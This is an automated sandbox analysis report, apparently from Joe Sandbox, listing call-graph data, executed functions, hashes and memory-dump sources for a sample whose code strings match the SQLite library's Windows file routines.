7ffeee13ca80 11 API calls _raise_excf 107584->107635 107586 7ffeee1edb46 107586->107557 107590 7ffeee1edb92 _raise_excf 107587->107590 107591 7ffeee1edd44 _raise_excf 107587->107591 107589 7ffeee1edbe4 107593 7ffeee1fbaa0 _raise_excf 36 API calls 107589->107593 107590->107589 107636 7ffeee13ca80 11 API calls _raise_excf 107590->107636 107591->107582 107645 7ffeee13ca80 11 API calls _raise_excf 107591->107645 107594 7ffeee1edc20 107593->107594 107597 7ffeee1edc49 107594->107597 107598 7ffeee1edc53 107594->107598 107603 7ffeee1edc51 107594->107603 107595 7ffeee1edc96 107640 7ffeee128730 11 API calls _raise_excf 107595->107640 107637 7ffeee1f3030 11 API calls _raise_excf 107597->107637 107598->107603 107638 7ffeee115f90 11 API calls _raise_excf 107598->107638 107599 7ffeee1edca5 107641 7ffeee128730 11 API calls _raise_excf 107599->107641 107603->107582 107603->107595 107604 7ffeee1edcdc _raise_excf 107603->107604 107642 7ffeee21cc90 36 API calls _raise_excf 107604->107642 107605 7ffeee1edd0f 107643 7ffeee20eeb0 11 API calls _raise_excf 107605->107643 107606 7ffeee1edccd 107606->107557 107608 7ffeee1edc64 107639 7ffeee13ca80 11 API calls _raise_excf 107608->107639 107611 7ffeee1edd19 107612 7ffeee1edd2d 107611->107612 107644 7ffeee12ee90 11 API calls _raise_excf 107611->107644 107614 7ffeee1f0790 _raise_excf 32 API calls 107612->107614 107615 7ffeee1edd35 107614->107615 107615->107557 107622 7ffeee13204b _raise_excf 107616->107622 107617 7ffeee1320a6 _raise_excf 107617->107559 107618 7ffeee1322e8 107618->107617 107666 7ffeee1a0a00 11 API calls 2 library calls 107618->107666 107622->107617 107622->107618 107623 7ffeee132262 107622->107623 107646 7ffeee1996b0 107622->107646 107662 7ffeee1a1310 30 API calls _raise_excf 107622->107662 107663 7ffeee1f3700 RaiseException _raise_excf 107622->107663 107664 7ffeee19e860 12 API calls _raise_excf 107622->107664 107623->107617 107623->107618 107665 7ffeee1a1530 12 API calls _raise_excf 107623->107665 107627->107562 107628->107567 107629->107576 107630->107575 107631->107578 107632->107562 107633->107553 107634->107556 107635->107586 107636->107589 107637->107603 107638->107608 107639->107603 107640->107599 107641->107606 107642->107605 107643->107611 107644->107612 107645->107582 107667 7ffeee1f4fe0 107646->107667 107648 7ffeee1996c1 107654 7ffeee1997f2 _raise_excf 107648->107654 107677 7ffeee18e4b0 107648->107677 107649 7ffeee1998a9 _raise_excf 107649->107654 107703 7ffeee1a1310 30 API calls _raise_excf 107649->107703 107651 7ffeee1996e8 107651->107649 107653 7ffeee1997e1 107651->107653 107651->107654 107696 7ffeee1f4980 107651->107696 107653->107649 107653->107654 107655 7ffeee199887 107653->107655 107656 7ffeee199857 _raise_excf 107653->107656 107654->107622 107655->107649 107702 7ffeee1c3ce0 11 API calls _raise_excf 107655->107702 107700 7ffeee14ab90 11 API calls _raise_excf 107656->107700 107659 7ffeee199873 107701 7ffeee1f4ea0 11 API calls _raise_excf 107659->107701 107662->107622 107663->107622 107664->107622 107665->107618 107666->107617 107668 7ffeee1f52c0 _raise_excf 107667->107668 107672 7ffeee1f5010 _raise_excf 107667->107672 107671 7ffeee1f50af _raise_excf 107668->107671 107704 7ffeee21ed30 107668->107704 107670 7ffeee1f51b4 _raise_excf 107670->107668 107670->107671 107674 7ffeee1f4980 _raise_excf 21 API calls 107670->107674 107671->107648 107672->107668 107672->107670 107672->107671 107676 7ffeee1f5181 _raise_excf 107672->107676 107710 7ffeee1bfb50 11 API calls _raise_excf 107672->107710 107674->107668 107676->107670 107676->107671 107711 7ffeee1a1ee0 12 API calls _raise_excf 107676->107711 107678 7ffeee18e4d2 107677->107678 107679 7ffeee18e505 107677->107679 107726 7ffeee128730 11 API calls _raise_excf 107678->107726 107712 7ffeee10e160 107679->107712 107681 7ffeee18e5f6 _raise_excf 107682 7ffeee18e4fe new[] 107681->107682 107728 7ffeee1a1310 30 API calls _raise_excf 107681->107728 107682->107651 107683 7ffeee18e530 _raise_excf 107683->107681 107683->107682 107685 7ffeee18e64c 107683->107685 107686 7ffeee18e6a4 107683->107686 107727 7ffeee128730 11 API calls _raise_excf 107685->107727 107688 7ffeee18e6d2 107686->107688 107689 7ffeee18e6bc 107686->107689 107688->107681 107690 7ffeee18e6ee 107688->107690 107720 7ffeee1a8340 107689->107720 107690->107682 107692 7ffeee18e715 107690->107692 107729 7ffeee1bbae0 11 API calls 2 library calls 107690->107729 107730 7ffeee12be10 11 API calls 2 library calls 107692->107730 107697 7ffeee1f4995 107696->107697 107699 7ffeee1f49e5 107696->107699 107697->107699 107731 7ffeee1a0b50 107697->107731 107699->107653 107700->107659 107701->107654 107702->107649 107703->107654 107706 7ffeee21ed6d _raise_excf 107704->107706 107705 7ffeee239c70 _raise_excf 30 API calls 107705->107706 107706->107705 107707 7ffeee21edd0 _raise_excf 107706->107707 107708 7ffeee21ee01 _raise_excf 107706->107708 107707->107671 107708->107707 107709 7ffeee1b2470 _raise_excf RaiseException 107708->107709 107709->107707 107710->107676 107711->107670 107713 7ffeee10e178 107712->107713 107714 7ffeee1a5a50 11 API calls 107713->107714 107717 7ffeee1a57b3 107713->107717 107718 7ffeee10e194 107713->107718 107714->107717 107715 7ffeee1a5883 107716 7ffeee1a5470 11 API calls 107715->107716 107716->107718 107717->107715 107717->107718 107719 7ffeee1a5a10 11 API calls 107717->107719 107718->107683 107719->107715 107721 7ffeee1a836a 107720->107721 107723 7ffeee1a8377 107720->107723 107722 7ffeee21f510 _raise_excf 29 API calls 107721->107722 107722->107723 107724 7ffeee1a8387 107723->107724 107725 7ffeee1036f0 20 API calls 107723->107725 107724->107681 107725->107724 107726->107682 107727->107681 107728->107682 107729->107692 107730->107682 107732 7ffeee1a0b60 _raise_excf 107731->107732 107733 7ffeee1f1fc0 new[] 11 API calls 107732->107733 107735 7ffeee1a0c47 _raise_excf 107732->107735 107734 7ffeee1a0bc2 new[] 107733->107734 107734->107735 107738 7ffeee104510 21 API calls 107734->107738 107735->107699 107736 7ffeee1a0c41 _raise_excf 107736->107735 107737 7ffeee114c20 _raise_excf 11 API calls 107736->107737 107737->107735 107738->107736

                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                      Function 00007FFEEE19F5D0 Relevance: 18.0, Strings: 14, Instructions: 540COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$:memory:$API call with %s database connection pointer$BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$invalid$main$misuse$temp$v
                                                                                                                                                                                      • API String ID: 0-534082081
                                                                                                                                                                                      • Opcode ID: 4ecbe897bc3acc97783ba582dca2a4c78f2ca07ca2fa220f425904c735e13a8f
                                                                                                                                                                                      • Instruction ID: e30c7a2e7ca9c309d90135d84894abf7dccc19defa1505d6d23db028285f2a35
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ecbe897bc3acc97783ba582dca2a4c78f2ca07ca2fa220f425904c735e13a8f
                                                                                                                                                                                      • Instruction Fuzzy Hash: E1426A25A08B8295EB659F25B84037927A1FF88B88F475136D9CE073B5CFBDE485D302
                                                                                                                                                                                      Function 00007FFEEE1B2570 Relevance: 16.4, Strings: 12, Instructions: 1358COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %!S$%s.%s$%s.%s.%s$'%s' is not a function$..%s$Expression tree is too large (maximum depth %d)$access to view "%s" prohibited$no such table: %s$no tables specified$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
                                                                                                                                                                                      • API String ID: 0-3486433936
                                                                                                                                                                                      • Opcode ID: e034a36cc12bd9215a9899eeb8c44c2f5c6ffbc58f4d44d84a9563eea4d82b8e
                                                                                                                                                                                      • Instruction ID: 5487fc88afb93b6f0ea9b8577270df17e4e8e93740952c893369f62dcb4ec77d
                                                                                                                                                                                      • Opcode Fuzzy Hash: e034a36cc12bd9215a9899eeb8c44c2f5c6ffbc58f4d44d84a9563eea4d82b8e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4BD2B132A09B82C6EB658F15E1403B977A0FB44B94F074236DE9D477A5EFB8E495C302
                                                                                                                                                                                      Function 00007FFEEE104510 Relevance: 9.3, APIs: 1, Strings: 4, Instructions: 516fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                      • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                      • API String ID: 823142352-3829269058
                                                                                                                                                                                      • Opcode ID: 9648a8e1b34e6d54a88f7339791b418315a19169b265df44462c620f0c7b9da4
                                                                                                                                                                                      • Instruction ID: 5d2f582f2dc2532f302acede1068b7e9b361ee3072a97e769aed917a920a5d04
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9648a8e1b34e6d54a88f7339791b418315a19169b265df44462c620f0c7b9da4
                                                                                                                                                                                      • Instruction Fuzzy Hash: E1328121E09A4686FB558F15F48037963A0BF89BA4F175636D9DE036F4DFBCE8808702
                                                                                                                                                                                      Function 00007FFEEE1BDF40 Relevance: 1.8, Strings: 1, Instructions: 553COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: :memory:
                                                                                                                                                                                      • API String ID: 0-2920599690
                                                                                                                                                                                      • Opcode ID: bad3a322da7ddd70a11fef03fe72386b6c13d9ab35f0f024c8c279fdf6b098db
                                                                                                                                                                                      • Instruction ID: d13d4d02403e704143c645e8ad51c27d4016f29c64d9e65db5f829047e2fea25
                                                                                                                                                                                      • Opcode Fuzzy Hash: bad3a322da7ddd70a11fef03fe72386b6c13d9ab35f0f024c8c279fdf6b098db
                                                                                                                                                                                      • Instruction Fuzzy Hash: 45329E62A0D78A82EB648F65B55037927A0FF89B44F174536CACD437B1EFBCE4918302
                                                                                                                                                                                      Function 00007FFEEE22BE70 Relevance: 1.7, APIs: 1, Instructions: 224COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InfoSystem
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 31276548-0
                                                                                                                                                                                      • Opcode ID: a4e6bad04b452fc8cc7e04760665395b3d9b48427dece9289ded6bff2a09062d
                                                                                                                                                                                      • Instruction ID: aed5e13baa436f418123c13b3810fd1b5e5d1fb5b545ff8f48c35a6dea9faaba
                                                                                                                                                                                      • Opcode Fuzzy Hash: a4e6bad04b452fc8cc7e04760665395b3d9b48427dece9289ded6bff2a09062d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 39B1D424E0AB0781FE698F59B84133422A4BFCCB40F575935D9DD073B0EFEEA9918242
                                                                                                                                                                                      Function 00007FFEEE1F4FE0 Relevance: .3, Instructions: 278COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 317393ef1743365a49eef31e05f6b03ef5d1b5c47fd7b020569ada7a3cf6cb0d
                                                                                                                                                                                      • Instruction ID: a71bebd451b14cffb0f23f34052a1dbaef308ae6f8449531680bb7202fae6a22
                                                                                                                                                                                      • Opcode Fuzzy Hash: 317393ef1743365a49eef31e05f6b03ef5d1b5c47fd7b020569ada7a3cf6cb0d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AC14322A08A4285FB598F29F45037D2791FF85B84F174136D9CD477B5DEACE885C382
                                                                                                                                                                                      Function 00007FFEEE105320 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 210fileCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 812 7ffeee105320-7ffeee10534c 813 7ffeee105361-7ffeee10536a 812->813 814 7ffeee10534e call 7ffeee241dd0 812->814 815 7ffeee10536c 813->815 816 7ffeee105379-7ffeee10537d 813->816 818 7ffeee105353-7ffeee105357 814->818 815->816 819 7ffeee105395-7ffeee105398 816->819 820 7ffeee10537f-7ffeee10538b call 7ffeee241840 816->820 821 7ffeee10535d 818->821 822 7ffeee10566a-7ffeee105676 818->822 824 7ffeee105616-7ffeee105633 819->824 825 7ffeee10539e-7ffeee1053e8 819->825 828 7ffeee105611-7ffeee105614 820->828 829 7ffeee105391 820->829 821->813 827 7ffeee105638-7ffeee105647 824->827 835 7ffeee1053ea-7ffeee1053f9 825->835 836 7ffeee10541f-7ffeee105421 825->836 830 7ffeee105649-7ffeee105650 827->830 831 7ffeee105653-7ffeee105659 827->831 828->824 828->827 829->819 830->831 833 7ffeee10565b 831->833 834 7ffeee105668 831->834 833->834 834->822 835->836 842 7ffeee1053fb-7ffeee10541d call 7ffeee241a30 835->842 837 7ffeee105456-7ffeee10545c 836->837 838 7ffeee105423-7ffeee105451 call 7ffeee241a30 836->838 840 7ffeee1054ae-7ffeee1054c4 call 7ffeee114be0 837->840 841 7ffeee10545e-7ffeee105466 837->841 845 7ffeee1055fd-7ffeee10560c 838->845 852 7ffeee1054c6-7ffeee1054cb 840->852 853 7ffeee1054d0-7ffeee105502 840->853 841->845 846 7ffeee10546c-7ffeee105470 call 7ffeee103a80 841->846 842->836 845->828 855 7ffeee105475-7ffeee105479 846->855 852->845 853->845 856 7ffeee105508 853->856 855->840 857 7ffeee10547b-7ffeee1054a9 call 7ffeee241a30 855->857 858 7ffeee105510-7ffeee105539 CreateFileMappingW 856->858 857->845 860 7ffeee10553b-7ffeee10557f MapViewOfFile 858->860 861 7ffeee1055b4-7ffeee1055eb call 7ffeee241a30 858->861 860->861 863 7ffeee105581-7ffeee1055ac 860->863 861->845 869 7ffeee1055ed-7ffeee1055f4 861->869 863->858 866 7ffeee1055b2 863->866 866->845 869->845
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$CreateMappingView
                                                                                                                                                                                      • String ID: winFileSize$winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                                                      • API String ID: 3452162329-2257004166
                                                                                                                                                                                      • Opcode ID: 98c65c9b1954f03cbc7f8ba50b308d85a32904e02442d46a91a2686d4563fd01
                                                                                                                                                                                      • Instruction ID: fedf1c6761624a1bd5ed85c6e9e8e0d93266893ba44db3fc90aa678accd0088a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 98c65c9b1954f03cbc7f8ba50b308d85a32904e02442d46a91a2686d4563fd01
                                                                                                                                                                                      • Instruction Fuzzy Hash: EC919F72A09A4286EB648F25F44037937A1FB88B98F574236CA8D87779DFBCE445C701
                                                                                                                                                                                      Function 00007FFEEE103A80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 95COMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1088 7ffeee103a80-7ffeee103a9a 1089 7ffeee103a9c-7ffeee103aad 1088->1089 1090 7ffeee103aae-7ffeee103ab4 1088->1090 1091 7ffeee103aca-7ffeee103ad3 1090->1091 1092 7ffeee103ab6-7ffeee103ac7 1090->1092 1093 7ffeee103adb 1091->1093 1094 7ffeee103ad5-7ffeee103ad9 1091->1094 1092->1091 1095 7ffeee103ade-7ffeee103b13 call 7ffeee242700 SetFilePointer 1093->1095 1094->1095 1098 7ffeee103b59-7ffeee103b6c SetEndOfFile 1095->1098 1099 7ffeee103b15-7ffeee103b24 1095->1099 1100 7ffeee103bab-7ffeee103bae 1098->1100 1101 7ffeee103b6e-7ffeee103b80 1098->1101 1099->1098 1107 7ffeee103b26-7ffeee103b57 call 7ffeee241a30 1099->1107 1102 7ffeee103bc7-7ffeee103bdd 1100->1102 1103 7ffeee103bb0-7ffeee103bbd 1100->1103 1101->1100 1111 7ffeee103b82-7ffeee103b8c 1101->1111 1105 7ffeee103bc2 call 7ffeee241b10 1103->1105 1106 7ffeee103bbf 1103->1106 1105->1102 1106->1105 1113 7ffeee103b91-7ffeee103ba9 call 7ffeee241a30 1107->1113 1111->1113 1113->1100 1113->1102
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                      • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                                                      • API String ID: 973152223-2471937615
                                                                                                                                                                                      • Opcode ID: bcff13c8a0a6972d2ce5bbe3d7eb2012d32025ee3e99687451907a690726906a
                                                                                                                                                                                      • Instruction ID: 6bfcda7bbc5584705a15c809ce90eef1a0e64eb7fbd531b655092dfe3011c5d9
                                                                                                                                                                                      • Opcode Fuzzy Hash: bcff13c8a0a6972d2ce5bbe3d7eb2012d32025ee3e99687451907a690726906a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 33418521A08A0686E7509F6AF44027973A0FB88B94B170236DE9D877B9DFBCD4828741
                                                                                                                                                                                      Function 00007FFEEE104D70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93fileCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1317 7ffeee104d70-7ffeee104d99 call 7ffeee2428d0 1320 7ffeee104d9b-7ffeee104da0 1317->1320 1321 7ffeee104da5-7ffeee104dbd GetFileAttributesW 1317->1321 1322 7ffeee104ed1-7ffeee104ee5 1320->1322 1323 7ffeee104dc3-7ffeee104dcd 1321->1323 1324 7ffeee104e50-7ffeee104e65 1321->1324 1325 7ffeee104dd0-7ffeee104dd2 1323->1325 1328 7ffeee104e67-7ffeee104e87 call 7ffeee241a30 1324->1328 1329 7ffeee104e8d 1324->1329 1327 7ffeee104dd8-7ffeee104dea DeleteFileW 1325->1327 1325->1328 1330 7ffeee104e92-7ffeee104e94 1327->1330 1331 7ffeee104df0-7ffeee104e03 1327->1331 1334 7ffeee104ec2-7ffeee104ecf call 7ffeee114c20 1328->1334 1329->1330 1333 7ffeee104e96-7ffeee104ebd call 7ffeee128730 1330->1333 1330->1334 1339 7ffeee104e89-7ffeee104e8b 1331->1339 1340 7ffeee104e09-7ffeee104e0f 1331->1340 1333->1334 1334->1322 1339->1328 1342 7ffeee104e17-7ffeee104e1a 1340->1342 1343 7ffeee104e11-7ffeee104e15 1340->1343 1344 7ffeee104e23-7ffeee104e4e 1342->1344 1345 7ffeee104e1c-7ffeee104e21 1342->1345 1343->1342 1343->1344 1344->1324 1344->1325 1345->1339 1345->1344
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
